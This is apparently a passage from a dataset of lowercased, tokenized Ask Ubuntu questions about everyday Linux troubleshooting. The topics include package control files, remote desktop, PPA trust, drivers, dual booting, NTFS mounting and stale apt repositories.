, libstdc++5 : i386 , libstdc++6 : i386 , libsasl2-2 : i386 , libgstreamermm-0.10-2 : i386 , libfreetype6 : i386 , libfontconfig1 : i386 , libx11-6 : i386 , libxrender1 : i386 , libice6 : i386 , libxext6 : i386 , libsm6 : i386 description : foo is awesome foo is really awesome installed-size : 71140 package : foo version : 1.0-1 section : base priority : optional maintainer : bar @ gmail.com architecture : i386 depends : gksu multi-arch : foreign description : foo is awesome foo is really awesome installed-size : 71140 this control file wont even compile as i get the following error message : dpkg-deb : error : parsing file 'foo/debian/control ' near line 25 package 'foo ' : several package info entries found , only one allowed . how do i do this correctly ? edit : this package does not come with the source . it comes with compiled 32 bit binaries , hence the need to depend on the 32 bit version of the libraries .
396034	how do i set up a remote desktop connection on a vps using terminal access ( 12.04 )	i dont know much about linux and i want to learn more so i signed up for a vps . i want to use some form of remote desktop and so far i am failing . i think i 've setup xrdp and vncserver on the linux side correctly but when i try to rdp from winxp remote desktop connection or realvnc 's vnc viewer it give me errors . i 've read 100 tutorials but nothing seems to help . the message i get from winrdc is `` because of a protocal error at the client ( code 0x1104 ) , this session will be disconnected . '' and from vncviewer it 's `` rfb protocol error : reading version failed : not an rfb server ? '' . any ideas ?
396037	how to verify trust and number of users of a certain ppa ?	on what can i base my trust towards specific ppa ? is there some method for gaining information on which i can base my trust ? from top of my mind , for example , how many people downloaded the package , what is their feedback , vote , vouch or something ? browsing forums to see if the author has trust of others is not good enough ( and lengthy ) ; looking at author 's websites whether they look legit is silly imho . to have an example , there is a webupd8 app by alin andrei that seems to have a good reputation . their lanchpad site shows details about the package including updates . that 's useful , alright . i think i need more to get confidence the software is qualit enough and without malicious intentions . for example , how can i see how many people actively use it or what problems they experienced ? the obvious problem with packages coming from third party is that they might be unintentionally bugged or otherwise imperfect and cause problems ( possibly hard to solve for a newbie user especially ) or intentionally containing malicious software . now we are a community so how do we cover this risk ? i 'd expect some sensible system , as is usually the case with unix , but so far when this question was asked the answers did not mention any method for a trust verification . i 'm afraid of hackers who gain credibility and one day flip to the dark side and include some listening backdoor malware into the packages they distribute . is this beyond healthy paranoia ? ( - : possible duplicates : there are good reasons why to regard this question as a duplicate . i 'll try to provide good reasons why is this question distinctive . in short , the other answers did n't provide solution to the problem described here . this question was already vaguely answered here : - are “ppa's” safe to add to my system , and what are some “red flags” to watch out for ? - should i trust these packages and ppas ? people answer like `` these are cool '' and `` this ppa 's fine and legit '' and `` in the end it 's your choice '' . the answers do n't provide any tool or method with which i could verify or quantify the trust myself . i do n't have enough reputation to comment there , so i 'm asking separate question . i 'm after some method of collecting evidence on which i can base my opinion whether to trust a certain ppa or not . checking the website for looking legit and browsing forum to read that some person thinks `` it 's ok '' does n't feel right enough . a question that seeks some kind of method was already asked . - how to find out the package download count from a ppa ? the answer there is not usable for me right awat as i do n't know how to work with such a script . and again , i do n't have 50 reputation points needed to write there so . so i 'm asking myself a new explicit question .
396040	network unclaimed for ar9565 qualcom atheros	*-network unclaimed description : network controller product : qca9565 / ar9565 wireless network adapter vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : bus_master cap_list configuration : latency=0 resources : memory : c0600000-c067ffff memory:9fb00000-9fb0ffff rfkill list all 0 : hci0 : bluetooth soft blocked : no hard blocked : no lsusb : bus 001 device 002 : id 8087:8000 intel corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 006 : id 0cf3:0036 atheros communications , inc . bus 001 device 004 : id 0bda:0129 realtek semiconductor corp . bus 001 device 005 : id 0c45:64ad microdia lspci : 00:00.0 host bridge : intel corporation haswell-ult dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation haswell-ult integrated graphics controller ( rev 09 ) 00:03.0 audio device : intel corporation device 0a0c ( rev 09 ) 00:14.0 usb controller : intel corporation lynx point-lp usb xhci hc ( rev 04 ) 00:16.0 communication controller : intel corporation lynx point-lp heci # 0 ( rev 04 ) 00:1b.0 audio device : intel corporation lynx point-lp hd audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation lynx point-lp pci express root port 3 ( rev e4 ) 00:1c.3 pci bridge : intel corporation lynx point-lp pci express root port 4 ( rev e4 ) 00:1c.4 pci bridge : intel corporation lynx point-lp pci express root port 5 ( rev e4 ) 00:1d.0 usb controller : intel corporation lynx point-lp usb ehci # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation lynx point-lp lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation lynx point-lp sata controller 1 [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation lynx point-lp smbus controller ( rev 04 ) 01:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 07 ) 02:00.0 network controller : qualcomm atheros qca9565 / ar9565 wireless network adapter ( rev 01 ) 03:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] venus pro [ radeon hd 8800m series ] lsmod : module size used by parport_pc 32867 0 ppdev 17114 0 rfcomm 47562 12 bnep 18240 2 joydev 17694 0 btusb 22432 0 coretemp 13642 0 kvm_intel 137888 0 kvm 422160 1 kvm_intel ghash_clmulni_intel 13221 0 aesni_intel 51134 0 cryptd 20531 2 ghash_clmulni_intel , aesni_intel aes_x86_64 17256 1 aesni_intel snd_hda_codec_realtek 46366 1 snd_hda_codec_hdmi 36726 1 dell_wmi 12682 0 sparse_keymap 13891 1 dell_wmi snd_hda_intel 43682 5 snd_hda_codec 188269 3 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel snd_hwdep 17765 1 snd_hda_codec snd_seq_midi 13325 0 snd_rawmidi 30750 1 snd_seq_midi snd_pcm 97523 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_seq_midi_event 14900 1 snd_seq_midi psmouse 102541 0 snd_seq 61931 2 snd_seq_midi , snd_seq_midi_event wmi 19257 1 dell_wmi snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14498 3 snd_seq_midi , snd_rawmidi , snd_seq dell_laptop 17426 0 dcdbas 14491 1 dell_laptop snd 83674 20 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_rawmidi , snd_pcm , snd_seq , snd_timer , snd_seq_device mac_hid 13254 0 fglrx 6728782 137 dm_multipath 23306 0 scsi_dh 14589 1 dm_multipath uvcvideo 78117 0 videobuf2_core 33025 1 uvcvideo i915 600141 2 videodev 125126 2 uvcvideo , videobuf2_core videobuf2_vmalloc 12861 1 uvcvideo ath3k 12918 0 videobuf2_memops 13405 1 videobuf2_vmalloc rts5139 350620 0 bluetooth 212001 25 rfcomm , bnep , btusb , ath3k soundcore 15092 1 snd microcode 23030 0 serio_raw 13216 0 amd_iommu_v2 19228 1 fglrx snd_page_alloc 18573 2 snd_hda_intel , snd_pcm drm_kms_helper 49259 1 i915 drm 290595 3 i915 , drm_kms_helper i2c_algo_bit 13565 1 i915 video 19653 1 i915 lp 17800 0 parport 46563 3 parport_pc , ppdev , lp dm_raid45 78156 0 xor 17153 1 dm_raid45 dm_mirror 22204 0 dm_region_hash 20962 1 dm_mirror dm_log 18565 3 dm_raid45 , dm_mirror , dm_region_hash r8169 62741 0 btrfs 781180 0 ahci 25869 2 libahci 27338 1 ahci zlib_deflate 27140 1 btrfs libcrc32c 12645 1 btrfs uname -a : linux mypc 3.5.0-44-generic # 67~precise1-ubuntu smp wed nov 13 16:16:57 utc 2013 x86_64 x86_64 x86_64 gnu/linux i have tried lot of links but nothing seem to be working ...
396041	will upgrading to 13.10 delete my files , apps , or settings ?	i am planning to upgrade from 13.04 to 13.10 ? does upgrading delete my files , documents and third party apps . or does it keep my files and documents but deletes third party apps ? ?
396045	partition problem when upgrading to 13.10	i am currently upgrading my ubuntu from 13.04 to 13.10 with the distribution upgrade app . how can i reduce my partition size to make more space for my windows partition ?
396049	chrome os to ubuntu error `` error : cgpt add : invalid argument to -i : `` -p '' ''	i got the error message error : cgpt add : invalid argument to -i : `` -p '' when i tried to switch from chrome os to ubuntu on a dual boot system . when i installed ubuntu it didnt boot to it , but the 290gb i have allocated for it is still taken up by it . how to solve this ? i 'm on a acer c7 .
396052	will 13.10 format a usb stick native via `` files '' ?	i plug in the drive , `` files '' opens . right click on the drive , select format , choose ntfs ( or fat or ext4 ) click format again , all the boxes go away and nothing is done . user has read/write permission , ca n't reset permissions for groups or other even after entering the password . used gparted and got it done , but the option is there and does n't work . what 's broken ? i 've tried several usb 2.0 flash drives , they all read and write fine , pretty sure it 's not a hardware thing .
396053	playonlinux wo n't open ; can not find curl from curl	every time i try to open play on linux i keep getting this message : play on linux can not find curl ( from curl ) you need to install it to continue but i ca n't seem to find where i am supposed to get this curl anywhere .
396057	changing totem subtitle downloder folder	totem subtitle downloader plugin is awesome . is there any way in which i can change default folder ~/.cache/totem/subtitles to desired one ? i want to subtitles to be saved . subtitle saved in ~/.cache/totem/subtitles is deleted when closing totem .
396059	old macbook ( intel ) stuck at loading initial ramdisk . no options from gnu grub screen work	my old macbook was previously running ubuntu but after being gone for a week , it will not boot up . it goes straight to the gnu grub screen , and from here , no options will work .
396065	how to remedy unmet dependencies error while downloading steam ?	i 'm running ubuntu 12.04 lts on a new asus notebook computer ( ubuntu was pre-installed ) . i tried to download steam from the software center and received the following error : package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . the following packages have unmet dependencies : steam-launcher : depends : curl but it is not going to be installed depends : libc6 ( > = 2.15 ) but 2.15-0ubuntu10.2 is to be installed before i tried to download steam i was successful installing and running minecraft.jar - that is the only other program that i have installed . i have searched for a solution for this issue on this site but i have n't seen my problem identified exactly and i 'm afraid to just keep running other scripts that may cause additional conflicts . please help ! thanks .
396071	garbled screen after login	i 've just installed ubuntu 13.10 on a sony viao . after logging in ( login screen works fine ) i get a garbled ( unreadable ) screen . the mouse does work , but as i move the mouse or click , the screen seems to change ( continued garbled ) . it seems like a display driver issue . i have to re-boot to get back to the login screen . how do i remedy this problem ? thanks .
396079	how to properly add new hard drivers to existing ubuntu system ?	i thought ubuntu will automatically add new hard drives so i only attached them and booted the system . ubuntu indeed added them but they look like usb flash drives and i can unmount them . how can i add them in a way they they look like a system partitions and not like some usb flash drives ?
396084	ubuntu on external usb hard drive	i just wanted to ask , before i do it . i copied my entire system with an exception of few not needed folders to an external usb hdd . if i install ubuntu ( same version ) on it , will it work as it is now ? will i lose any data ? i 'm sorry if it 's a duplicate , but i could not find an answer for it . if anyone tried it , please let me know what happens exactly . thanks : )
396086	how to purge another os and install ubuntu safely ?	i 've been testing out different linux os 's and was beforedhand on fedora . a few weeks back , when booting up fedora , my computer crashed . when i tried to boot it back up , it would freeze at the bios post . today i decided to give it another try , and downloaded 12.04 on a cd rom to see if i could load it . i can get it to load up the cd and i 'm able to try out ubuntu but when i go to install it it tells me i have to have at least 4.5 gb available drive space and it wo n't let me continue . the problem is i ca n't figure out how to delete files on the hard drive to free it up to be able to install ubuntu . do you think the hard drive fried back with that crash under fedora ?
396088	build data.tar.gz instead of data.tar.xz inside deb	i just updated to dpkg 1.17 and it now defaults to compressing data.tar with xz instead of gzip . that creates a problem when i 'm remastering cd 's for older versions of ubuntu . is there a way to tell dpkg-buildpackage to create data.tar.gz instead of xz ? i tried -zgzip without success . related manpages : dpkg-buildpackage -z , -z passed unchanged to dpkg-source . see its manual page . dpkg-source -zcompression , -- compression=compression specify the compression to use for created files ( tarballs and diffs ) . note that this option will not cause existing tarballs to be recompressed , it only affects new files . supported values are : gzip , bzip2 , lzma and xz . gzip is the default . xz is only supported since dpkg-dev 1.15.5 .
396089	how do i install ubuntu from windows ?	i have left 16gb unpartitioned for it . i imagine i would start the installer from windows and it would create an initial bootable file system on my hard drive , then i would restart and boot it , and it finishes the install . i want to keep my windows too . is this possible ?
396091	command not found when sshing into ubuntu for amazon instance	when trying to ssh into my ubuntu instance , i receive -bash : ssh : command not found . i 'm trying to connect to an instance on amazonaws . im running cygwin off of windows 7
396092	grub not showing xubuntu	i installed xubuntu and booted up again to find no grub except it booted up into the windows partition . during the installation , i put the boot loader onto the xubuntu partition , is something wrong with that ? if so , tell me how to fix it and get grub back .
396094	firefox installation error	i am trying to install firefox but there is error like ; failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_25.0.1+build1-0ubuntu0.13.10.1_amd64.deb 404 not found [ ip : 91.189.91.14 80 ] e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? also i tried software center but it said also ; failed to download package files check your internet connection . failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_25.0.1+build1-0ubuntu0.13.10.1_amd64.deb 404 not found [ ip : 91.189.91.14 80 ] what is the problem for this basic operation ?
396096	“unexpected error” when trying to get back chrome os from ubuntu	how do i get back chrome os from ubuntu 13.04 ? it keeps saying `` unexpected error '' when i use chrome recovery . i have already tried two flash drives , but they did n't work because their capacity was less than 4 gigabytes . i was using ubuntu 13.04 when i restarted my computer because of lag . when i booted up ubuntu , it already said there was errors , ignored them . i got google chrome web browser for it , and it was super lag at the time . so what was going though my head was to restart it , i did and all it said was `` chrome os is damaged or missing '' so i tried the usb recovery , but it always says unexpected error , please try again . go to the google forums to seek help . hwid : parrot cutlassfish a-e 3149 recovery_reason : 0x50 tpm setup error in read-only firmware vbsd.flags : 0x00000640 vbnv.raw : 70 20 00 00 00 00 1f 00 00 00 00 00 00 00 00 f8 dev_boot_usb : 0 dev_boot_signed_only : 0 tpm : fwver=0x00000000 kernver=0x00000000 gbb.flags : 0x00000000 gbb.rootkey : xxxxxxxxxxxxxxxx gbb.recovery_key : xxxxxxxxxxxxxxxx read-only firmware id : google.parrot.2685.54.0 active firmware id : google.parrot.2685.54.0
396098	how to set the hostname of a postfix mail server ?	in a vps with ubuntu 12.04 lts , i have installed postfix . the domain name is example.com , the vps hostname is server.example.com . for the domain example.com i create an mx record . after that a mail server mail.example.com is up and running . how to in postfix configuration main.cf set myhostname ? myhostname=server.example.com or myhostname=mail.example.com
396099	where is nautilus in ubuntu 13.10 ?	where is nautilus in ubuntu 13.10 ? i see only files app which is similar but lacks some nautilus features , especially on right-click menu . can it be installed along official files app ? i was also unable to install nautilus-scripts in files .
396101	hosting ubuntu and windows on one pc	i 've new years resolution to get to grips with a linux type of operating system and i think ubuntu looks the most likely i 'd enjoy , as it seems to have good support and a thriving community . however , there is some software for that i rely on windows for . is there a way i could host dual operating systems on the same pc and chose which one i 'd like to use at start-up ?
396104	phablet flash comand not found error	when i try to install ubuntu on my galaxy nexus 4 phone , everything up to step 3 was fine , but in step 4 , the command phablet-flash ubuntu-system -- channel devel -- bootstrap gives me the error phablet-flash : command not found .
396107	how to have nautilus window divided into two or three columns ( like mac ) miller columns ?	i would like the nautilus windows look like a mac : when you click on a folder ( in the part 1 of screen ) , the content of this folder was display ( in part 2 of screen ) it 's very useful when you have many files . it 's possible to have this functionality in ubuntu ?
396111	ubuntu 13.10/win 8.1 dual boot cd	i burned a cd with ubuntu 13.10 , but when i booted up , it would not recognize the cd . so i installed the startup help for if that were to happen , but when i select ubuntu , it gives me an error screen saying a file is missing . i have tried to burn a new cd .
396113	lightdm and startx fail to start graphics mode ; traces of nvidia driver are involved	my ubuntu 12.04 system boots to a text mode login prompt ( virtual console # 1 ) since i upgraded the kernel ( using ubuntu 's automatic upgrade system ) . i was using an nvidia driver that worked well until that update . i had installed it from nvidia 's shell script instead of apt-get . i have uninstalled this driver . i also tried ubuntu 's nvidia-current package , without success . i have purged it . i also reinstalled the desktop packages using `` apt-get install ubuntu-desktop '' . rebooting still boots to text mode . doing `` sudo service lightdm restart '' does not go to graphics mode . it just switches to virtual console # 7 . as a test , i run sudo startx from a text mode shell , and it fails with this message : fatal : error inserting nvidia_304 ( /lib/modules/3.8.0-34-generic/updates/dkms/nvidia_304.ko ) : no such device that .ko file exists and contains 15254672 bytes . it seems like the system still wants to use the nvidia driver , even though i uninstalled it . how can i tell startx to avoid the nvidia driver completely ? once startx would work , i assume lightdm might work too . then i could try to reinstall the nvidia driver . i have looked at numerous pages on this forum , but everybody seems to have a different variant of this problem . uname -a reports 3.8.0-34-generic . the pc is an x86_64 . the system has the linux-headers-3.8.0-34-generic package , according to dpkg -l .
396115	how can i record video from 2 webcams ?	i own 2 logitech c-615 webcams and i want to record their footage simultaneously . when i open cheese i can only use one webcam , and i ca n't open another cheese window . when i try and use both cheese and guvcview , guvcview does n't show a picture . how can i get them both to work at the same time ? thanks : -d
396116	how to delete hiberation files from a ntfs parition	i have a ntfs partition having all my media data . whenever i mount this on linux it gives the following error : an error occurred while accessing 'home ' , the system responded : the requested operation has failed : error mounting /dev/sda3 at /run/media/aimad /aimad 's : command-line `mount -t `` ntfs '' -o '' uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=100 , dmask=0077 , fmask=0177 '' '' /dev/sda3 '' `` /run/media/aimad/aimad 's '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda3 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . i have completely shifted to linux now and do n't have windows anymore . now i was wondering how can i delete the hibernation system files so as i can mount this partition as r/w . how to fix this issue ?
396118	grubs manual installation on windows	should i install a boot loader before i install ubuntu ? if so , how can i install it manually from windows 7 ?
396120	what is the purpose of the ssl-cert-snakeoil.key	right now i installed ubuntu 12.04.3 server which i want to access via ssh . for that reason i created a private key which i moved to /etc/ssl/private/ i 'm just wondering why there already is private key ssl-cert-snakeoil.key in there . where is this private key used and can i delete it ?
396122	disabling the anti-aliasing for a specific font with user 's fonts.conf	purpose : i am trying to disable anti-aliasing via ~/.config/fontconfig/fonts.conf for a specific font , but so far without success . if my understanding is correct , then the cause is , that the system wide configuration takes precedence over my own config . question : how to disable the anti-aliasing for a specific font with user 's fonts.conf and taking precedence over the system wide configuration ? side remark : i prefer doing it without touching the system configuration and i prefer not to do it on the application level . details : system is ubuntu raring ringtail 13.04 . this is my ~/.config/fontconfig/fonts.conf : < ? xml version= '' 1.0 '' ? > < ! doctype fontconfig system `` fonts.dtd '' > < fontconfig > < match target= '' pattern '' > < test name= '' family '' > < string > dejavu sans mono < /string > < /test > < edit name= '' antialias '' mode= '' assign '' > < bool > false < /bool > < /edit > < /match > < /fontconfig > the relevant files in /etc/fonts/conf.d are 10-antialias.conf 50-user.conf with the following contents : /etc/fonts/conf.d > cat 10-antialias.conf 50-user.conf ... < match target= '' font '' > < edit name= '' antialias '' mode= '' assign '' > < bool > true < /bool > < /edit > < /match > ... < include ignore_missing= '' yes '' prefix= '' xdg '' > fontconfig/fonts.conf < /include > ... and this is what fc-match returns : ~ > fc-match -v 'dejavu sans mono ' family antialias pattern has 2 elts ( size 16 ) family : `` dejavu sans mono '' ( s ) antialias : fctrue ( w ) please note , that antialias is fctrue !
396123	want left and right mouse buttons to both map to select	in ubuntu 12.04 my asus n56dp mapped both the right and left mouse buttons to be select , or left mouse button . to get a right click or context menu , i would use a two finger click . i quickly got used to this . that all changed with 12.10 and later . i am now on ubuntu 13.10 . now lmb is select and rmb is context menu . note this is one of those clickpad trackpads with two buttons underneath it . but physically the buttons are not separate , they are hidden under the trackpad . i now hate the right / left mouse button behavior . with no physical context clues you never know which button you 're actually clicking anymore . i 'd like the old 12.04 functionality of treating this like a single button trackpad back , but ca n't figure out how to do it . all the research i 've done so far shows how to re-order the buttons on a device but not how to reassign them in such a way that rmb and lmb are the same . recap : i want lmb and rmb to initiate select . i want two finger click to initiate context menu . xinput -- list virtual core pointer id=2 [ master pointer ( 3 ) ] ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ↳ etps/2 elantech touchpad id=14 [ slave pointer ( 2 ) ] xinput -- list-props `` etps/2 elantech touchpad '' device 'etps/2 elantech touchpad ' : device enabled ( 144 ) : 1 coordinate transformation matrix ( 146 ) : 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 device accel profile ( 267 ) : 1 device accel constant deceleration ( 268 ) : 2.500000 device accel adaptive deceleration ( 269 ) : 1.000000 device accel velocity scaling ( 270 ) : 12.500000 synaptics edges ( 271 ) : 136 , 3284 , 110 , 1942 synaptics finger ( 272 ) : 1 , 1 , 0 synaptics tap time ( 273 ) : 180 synaptics tap move ( 274 ) : 175 synaptics tap durations ( 275 ) : 180 , 180 , 100 synaptics clickpad ( 276 ) : 1 synaptics middle button timeout ( 277 ) : 0 synaptics two-finger pressure ( 278 ) : 282 synaptics two-finger width ( 279 ) : 7 synaptics scrolling distance ( 280 ) : 79 , 79 synaptics edge scrolling ( 281 ) : 0 , 0 , 0 synaptics two-finger scrolling ( 282 ) : 1 , 1 synaptics move speed ( 283 ) : 1.000000 , 1.750000 , 0.050150 , 0.000000 synaptics off ( 284 ) : 0 synaptics locked drags ( 285 ) : 0 synaptics locked drags timeout ( 286 ) : 5000 synaptics tap action ( 287 ) : 2 , 3 , 0 , 0 , 1 , 3 , 0 synaptics click action ( 288 ) : 1 , 3 , 0 synaptics circular scrolling ( 289 ) : 0 synaptics circular scrolling distance ( 290 ) : 0.100000 synaptics circular scrolling trigger ( 291 ) : 0 synaptics palm detection ( 292 ) : 0 synaptics palm dimensions ( 293 ) : 10 , 200 synaptics coasting speed ( 294 ) : 20.000000 , 50.000000 synaptics pressure motion ( 295 ) : 30 , 160 synaptics pressure motion factor ( 296 ) : 1.000000 , 1.000000 synaptics resolution detect ( 297 ) : 1 synaptics grab event device ( 298 ) : 1 synaptics gestures ( 299 ) : 1 synaptics capabilities ( 300 ) : 1 , 0 , 0 , 1 , 1 , 1 , 1 synaptics pad resolution ( 301 ) : 31 , 31 synaptics area ( 302 ) : 0 , 0 , 0 , 0 synaptics soft button areas ( 303 ) : 1710 , 0 , 1682 , 0 , 0 , 0 , 0 , 0 synaptics noise cancellation ( 304 ) : 19 , 19 device product id ( 260 ) : 2 , 14 device node ( 261 ) : `` /dev/input/event7 '' synclient -l parameter settings : leftedge = 136 rightedge = 3284 topedge = 110 bottomedge = 1942 fingerlow = 1 fingerhigh = 1 maxtaptime = 180 maxtapmove = 175 maxdoubletaptime = 180 singletaptimeout = 180 clicktime = 100 emulatemidbuttontime = 0 emulatetwofingerminz = 282 emulatetwofingerminw = 7 vertscrolldelta = 79 horizscrolldelta = 79 vertedgescroll = 0 horizedgescroll = 0 cornercoasting = 0 verttwofingerscroll = 1 horiztwofingerscroll = 1 minspeed = 1 maxspeed = 1.75 accelfactor = 0.0501505 touchpadoff = 0 lockeddrags = 0 lockeddragtimeout = 5000 rtcornerbutton = 2 rbcornerbutton = 3 ltcornerbutton = 0 lbcornerbutton = 0 tapbutton1 = 1 tapbutton2 = 3 tapbutton3 = 0 clickfinger1 = 1 clickfinger2 = 3 clickfinger3 = 0 circularscrolling = 0 circscrolldelta = 0.1 circscrolltrigger = 0 palmdetect = 0 palmminwidth = 10 palmminz = 200 coastingspeed = 20 coastingfriction = 50 pressuremotionminz = 30 pressuremotionmaxz = 160 pressuremotionminfactor = 1 pressuremotionmaxfactor = 1 resolutiondetect = 1 grabeventdevice = 1 tapanddraggesture = 1 arealeftedge = 0 arearightedge = 0 areatopedge = 0 areabottomedge = 0 horizhysteresis = 19 verthysteresis = 19 clickpad = 1 rightbuttonarealeft = 1710 rightbuttonarearight = 0 rightbuttonareatop = 1682 rightbuttonareabottom = 0 middlebuttonarealeft = 0 middlebuttonarearight = 0 middlebuttonareatop = 0 middlebuttonareabottom = 0
396124	best practices to keep your ubuntu desktop and laptop in sync ?	how would you approach if you want your desktop and laptop to be in sync . so you do n't have to install/configure the same app twice and also can just stop working on the one device and continue on the other ?
396126	why is medibuntu.org still offered as a package source if it has been shutdown since 2010 ?	when trying an update , my output showed that `` some index files failed to download '' and `` they have been ignored , or old ones used instead . '' have i misconfigured something , or is there a reason why mediubuntu.org is still listed as an option if it has been shutdown ? here is my update : jeff @ bigjeff : ~ $ sudo apt-get update hit http : //us.archive.ubuntu.com precise release.gpg hit http : //us.archive.ubuntu.com precise-updates release.gpg hit http : //us.archive.ubuntu.com precise-backports release.gpg hit http : //security.ubuntu.com precise-security release.gpg hit http : //ppa.launchpad.net precise release.gpg hit http : //us.archive.ubuntu.com precise release hit http : //us.archive.ubuntu.com precise-updates release hit http : //security.ubuntu.com precise-security release hit http : //us.archive.ubuntu.com precise-backports release hit http : //ppa.launchpad.net precise release hit http : //security.ubuntu.com precise-security/main sources hit http : //us.archive.ubuntu.com precise/main sources hit http : //us.archive.ubuntu.com precise/restricted sources hit http : //us.archive.ubuntu.com precise/universe sources hit http : //us.archive.ubuntu.com precise/multiverse sources hit http : //us.archive.ubuntu.com precise/main amd64 packages hit http : //us.archive.ubuntu.com precise/restricted amd64 packages hit http : //us.archive.ubuntu.com precise/universe amd64 packages hit http : //us.archive.ubuntu.com precise/multiverse amd64 packages hit http : //us.archive.ubuntu.com precise/main i386 packages hit http : //us.archive.ubuntu.com precise/restricted i386 packages hit http : //security.ubuntu.com precise-security/restricted sources hit http : //security.ubuntu.com precise-security/universe sources hit http : //security.ubuntu.com precise-security/multiverse sources hit http : //security.ubuntu.com precise-security/main amd64 packages hit http : //security.ubuntu.com precise-security/restricted amd64 packages hit http : //security.ubuntu.com precise-security/universe amd64 packages hit http : //security.ubuntu.com precise-security/multiverse amd64 packages hit http : //security.ubuntu.com precise-security/main i386 packages hit http : //security.ubuntu.com precise-security/restricted i386 packages hit http : //security.ubuntu.com precise-security/universe i386 packages hit http : //us.archive.ubuntu.com precise/universe i386 packages hit http : //us.archive.ubuntu.com precise/multiverse i386 packages hit http : //us.archive.ubuntu.com precise/main translationindex hit http : //us.archive.ubuntu.com precise/multiverse translationindex hit http : //us.archive.ubuntu.com precise/restricted translationindex hit http : //us.archive.ubuntu.com precise/universe translationindex hit http : //ppa.launchpad.net precise/main sources hit http : //security.ubuntu.com precise-security/multiverse i386 packages hit http : //security.ubuntu.com precise-security/main translationindex hit http : //us.archive.ubuntu.com precise-updates/main sources hit http : //us.archive.ubuntu.com precise-updates/restricted sources hit http : //us.archive.ubuntu.com precise-updates/universe sources hit http : //us.archive.ubuntu.com precise-updates/multiverse sources hit http : //us.archive.ubuntu.com precise-updates/main amd64 packages hit http : //us.archive.ubuntu.com precise-updates/restricted amd64 packages hit http : //us.archive.ubuntu.com precise-updates/universe amd64 packages hit http : //us.archive.ubuntu.com precise-updates/multiverse amd64 packages hit http : //us.archive.ubuntu.com precise-updates/main i386 packages hit http : //security.ubuntu.com precise-security/multiverse translationindex hit http : //security.ubuntu.com precise-security/restricted translationindex hit http : //security.ubuntu.com precise-security/universe translationindex hit http : //ppa.launchpad.net precise/main amd64 packages hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex hit http : //us.archive.ubuntu.com precise-updates/restricted i386 packages hit http : //us.archive.ubuntu.com precise-updates/universe i386 packages hit http : //us.archive.ubuntu.com precise-updates/multiverse i386 packages hit http : //us.archive.ubuntu.com precise-updates/main translationindex hit http : //us.archive.ubuntu.com precise-updates/multiverse translationindex hit http : //us.archive.ubuntu.com precise-updates/restricted translationindex hit http : //us.archive.ubuntu.com precise-updates/universe translationindex hit http : //us.archive.ubuntu.com precise-backports/main sources hit http : //us.archive.ubuntu.com precise-backports/restricted sources hit http : //us.archive.ubuntu.com precise-backports/universe sources hit http : //us.archive.ubuntu.com precise-backports/multiverse sources hit http : //us.archive.ubuntu.com precise-backports/main amd64 packages hit http : //us.archive.ubuntu.com precise-backports/restricted amd64 packages hit http : //us.archive.ubuntu.com precise-backports/universe amd64 packages hit http : //us.archive.ubuntu.com precise-backports/multiverse amd64 packages hit http : //us.archive.ubuntu.com precise-backports/main i386 packages hit http : //security.ubuntu.com precise-security/main translation-en hit http : //security.ubuntu.com precise-security/multiverse translation-en hit http : //us.archive.ubuntu.com precise-backports/restricted i386 packages hit http : //us.archive.ubuntu.com precise-backports/universe i386 packages hit http : //us.archive.ubuntu.com precise-backports/multiverse i386 packages hit http : //us.archive.ubuntu.com precise-backports/main translationindex hit http : //us.archive.ubuntu.com precise-backports/multiverse translationindex hit http : //us.archive.ubuntu.com precise-backports/restricted translationindex hit http : //us.archive.ubuntu.com precise-backports/universe translationindex hit http : //us.archive.ubuntu.com precise/main translation-en hit http : //us.archive.ubuntu.com precise/multiverse translation-en hit http : //security.ubuntu.com precise-security/restricted translation-en hit http : //security.ubuntu.com precise-security/universe translation-en hit http : //us.archive.ubuntu.com precise/restricted translation-en hit http : //us.archive.ubuntu.com precise/universe translation-en hit http : //us.archive.ubuntu.com precise-updates/main translation-en hit http : //us.archive.ubuntu.com precise-updates/multiverse translation-en hit http : //us.archive.ubuntu.com precise-updates/restricted translation-en hit http : //us.archive.ubuntu.com precise-updates/universe translation-en hit http : //us.archive.ubuntu.com precise-backports/main translation-en hit http : //us.archive.ubuntu.com precise-backports/multiverse translation-en hit http : //us.archive.ubuntu.com precise-backports/restricted translation-en hit http : //us.archive.ubuntu.com precise-backports/universe translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en err http : //packages.medibuntu.org precise release.gpg could not resolve 'packages.medibuntu.org' reading package lists ... done w : failed to fetch http : //packages.medibuntu.org/dists/precise/release.gpg could not resolve 'packages.medibuntu.org' w : some index files failed to download . they have been ignored , or old ones used instead . lsb_release -a no lsb modules are 